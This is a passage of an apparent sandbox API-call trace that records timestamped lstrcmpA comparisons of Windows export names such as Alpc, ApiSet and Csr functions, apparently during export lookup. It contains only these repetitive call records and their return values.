[0128.344] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0128.344] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0128.344] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0128.344] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0128.344] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0128.344] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0128.344] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0128.344] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0128.344] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0128.344] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0128.344] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0128.344] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0128.344] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0128.344] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0128.344] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0128.344] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0128.344] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0128.344] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0128.344] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0128.344] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0128.344] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0128.344] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0128.344] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0128.344] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0128.344] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0128.345] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0128.345] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0128.345] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0128.345] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0128.345] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0128.345] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0128.345] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0128.345] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0129.946] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0129.946] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0129.946] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0129.946] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0129.946] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0129.946] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0129.946] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0129.947] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0129.947] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0129.947] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0129.947] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0129.947] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0129.947] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0129.947] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0129.947] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0129.947] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0129.947] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0129.947] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0129.947] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0129.947] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0129.947] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0129.947] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0129.947] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0129.947] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0129.947] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0129.947] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0129.947] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0129.947] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0129.947] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0129.947] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0129.947] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0129.947] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0129.948] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0129.949] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0129.949] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0129.949] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0129.949] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0129.949] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0129.949] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0129.949] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0129.949] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0129.949] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0129.949] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0129.949] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0129.949] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0129.949] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0129.949] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0129.949] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0129.949] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0129.949] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0129.949] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0129.949] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0129.949] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0129.949] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0129.949] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0129.949] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0129.949] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0129.949] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0129.950] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0129.950] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0129.951] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0129.951] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0129.951] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0129.951] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0129.951] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0129.951] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0129.951] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0129.951] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0129.951] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0129.951] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0129.951] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0129.951] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0129.951] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0129.951] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0129.951] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0129.951] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0129.951] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0129.951] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0129.951] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0129.951] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0129.951] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0129.951] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0129.951] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0129.951] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0129.951] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0129.954] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0129.954] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0129.954] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="CsrAllocateMessagePointer") returned 1 [0129.954] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="CsrCaptureMessageBuffer") returned 0 [0129.954] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="A_SHAFinal") returned 1 [0129.954] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="A_SHAInit") returned 1 [0129.954] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="A_SHAUpdate") returned 1 [0129.954] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0129.954] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="AlpcFreeCompletionListMessage") returned 1 [0129.954] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0129.954] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0129.954] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="AlpcGetHeaderSize") returned 1 [0129.954] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="AlpcGetMessageAttribute") returned 1 [0129.954] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="AlpcInitializeMessageAttribute") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="AlpcRegisterCompletionList") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="AlpcRundownCompletionList") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="AlpcUnregisterCompletionList") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="ApiSetQueryApiSetPresence") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="CsrAllocateCaptureBuffer") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="CsrAllocateMessagePointer") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="CsrCaptureMessageBuffer") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="CsrCaptureMessageMultiUnicodeStringsInPlace") returned 0 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="A_SHAFinal") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="A_SHAInit") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="A_SHAUpdate") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="AlpcFreeCompletionListMessage") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="AlpcGetHeaderSize") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="AlpcGetMessageAttribute") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="AlpcInitializeMessageAttribute") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="AlpcRegisterCompletionList") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="AlpcRundownCompletionList") returned 1 [0129.955] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="AlpcUnregisterCompletionList") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="ApiSetQueryApiSetPresence") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="CsrAllocateCaptureBuffer") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="CsrAllocateMessagePointer") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="CsrCaptureMessageBuffer") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="CsrCaptureMessageMultiUnicodeStringsInPlace") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="CsrCaptureMessageString") returned 0 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="A_SHAFinal") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="A_SHAInit") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="A_SHAUpdate") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="AlpcFreeCompletionListMessage") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="AlpcGetHeaderSize") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="AlpcGetMessageAttribute") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="AlpcInitializeMessageAttribute") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="AlpcRegisterCompletionList") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="AlpcRundownCompletionList") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="AlpcUnregisterCompletionList") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="ApiSetQueryApiSetPresence") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="CsrAllocateCaptureBuffer") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="CsrAllocateMessagePointer") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="CsrCaptureMessageBuffer") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="CsrCaptureMessageMultiUnicodeStringsInPlace") returned 1 [0129.956] lstrcmpA (lpString1="CsrCaptureTimeout", 